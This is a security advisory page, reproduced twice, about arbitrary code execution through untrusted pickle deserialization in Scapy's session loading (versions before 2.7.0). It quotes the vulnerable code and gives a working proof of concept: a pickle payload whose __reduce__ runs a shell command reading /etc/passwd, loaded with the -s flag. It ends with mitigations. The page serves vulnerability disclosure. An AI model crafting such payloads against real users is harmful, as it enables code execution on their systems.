Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-cq46-m9x9-j8w2: Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization

Summary

An unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code when a malicious session file is locally loaded via the -s option. This requires convincing a user to manually load a malicious session file.

Details

Scapy’s interactive shell supports session loading using gzip-compressed pickle files:

./run_scapy -s <session_file.pkl.gz>

Internally, this triggers:

# main.py
SESSION = pickle.load(gzip.open(session_name, "rb"))

Since no validation or restriction is performed on the deserialized object, any code embedded via __reduce__() will be executed immediately. This makes it trivial for an attacker to drop a malicious .pkl.gz in a shared folder and have it executed by unsuspecting users.

The vulnerability exists in the load_session function, which deserializes data using pickle.load() on .pkl.gz files provided via the -s CLI flag or programmatically through conf.session.

Affected lines in source code: https://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572

try:
    s = pickle.load(gzip.open(fname, "rb"))
except IOError:
    try:
        s = pickle.load(open(fname, "rb"))

PoC

Create a malicious payload:

import pickle, os, gzip

class RCE:
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd",))

payload = gzip.compress(pickle.dumps(RCE()))

with open("evil.pkl.gz", "wb") as f:
    f.write(payload)

Then run Scapy with:

./run_scapy -s ./evil.pkl.gz

Result: cat /etc/passwd executes immediately, before shell is shown.

<img width="1035" height="961" alt="Screenshot 2025-08-05 034930-1" src="https://github.com/user-attachments/assets/6748e9bc-57cb-4bd7-977e-e29da8ebc23d" />

Impact

This is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data is deserialized.

Any user who can trick another user into loading a crafted .pkl.gz session file (e.g. via -s option) can execute arbitrary Python code.

  • Vulnerability type: Insecure deserialization (Python pickle)
  • CWE: CWE-502: Deserialization of Untrusted Data
  • CVSS v4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • CVSS Score: 5.4 (Medium)
  • Impact: Arbitrary Code Execution
  • Attack vector: Local or supply chain (malicious .pkl.gz)
  • Affected users: Any user who loads session files (even interactively)
  • Affected version: Scapy v2.6.1

Mitigations

  • Do not use ‘sessions’ (the -s option when launching Scapy).
  • Use the Scapy 2.7.0+ where the session mechanism has been removed.
ghsa
Open in Source
#vulnerability#git#rce

Summary

An unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code when a malicious session file is locally loaded via the -s option. This requires convincing a user to manually load a malicious session file.

Details

Scapy’s interactive shell supports session loading using gzip-compressed pickle files:

./run_scapy -s <session_file.pkl.gz>

Internally, this triggers:

# main.py SESSION = pickle.load(gzip.open(session_name, “rb”))

Since no validation or restriction is performed on the deserialized object, any code embedded via reduce() will be executed immediately. This makes it trivial for an attacker to drop a malicious .pkl.gz in a shared folder and have it executed by unsuspecting users.

The vulnerability exists in the load_session function, which deserializes data using pickle.load() on .pkl.gz files provided via the -s CLI flag or programmatically through conf.session.

Affected lines in source code:
https://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572

try: s = pickle.load(gzip.open(fname, “rb”)) except IOError: try: s = pickle.load(open(fname, “rb”))

PoC

Create a malicious payload:

import pickle, os, gzip

class RCE: def __reduce__(self): return (os.system, ("cat /etc/passwd",))

payload = gzip.compress(pickle.dumps(RCE()))

with open("evil.pkl.gz", “wb”) as f: f.write(payload)

Then run Scapy with:

./run_scapy -s ./evil.pkl.gz

Result: cat /etc/passwd executes immediately, before shell is shown.

Impact

This is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data is deserialized.

Any user who can trick another user into loading a crafted .pkl.gz session file (e.g. via -s option) can execute arbitrary Python code.

  • Vulnerability type: Insecure deserialization (Python pickle)
  • CWE: CWE-502: Deserialization of Untrusted Data
  • CVSS v4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • CVSS Score: 5.4 (Medium)
  • Impact: Arbitrary Code Execution
  • Attack vector: Local or supply chain (malicious .pkl.gz)
  • Affected users: Any user who loads session files (even interactively)
  • Affected version: Scapy v2.6.1

Mitigations

  • Do not use ‘sessions’ (the -s option when launching Scapy).
  • Use the Scapy 2.7.0+ where the session mechanism has been removed.

References

  • GHSA-cq46-m9x9-j8w2
  • secdev/scapy@13621d1

ghsa: Latest News

GHSA-rc54-2g2c-g36g: OpenBao and Vault Leak []byte Fields in Audit Logs
ghsa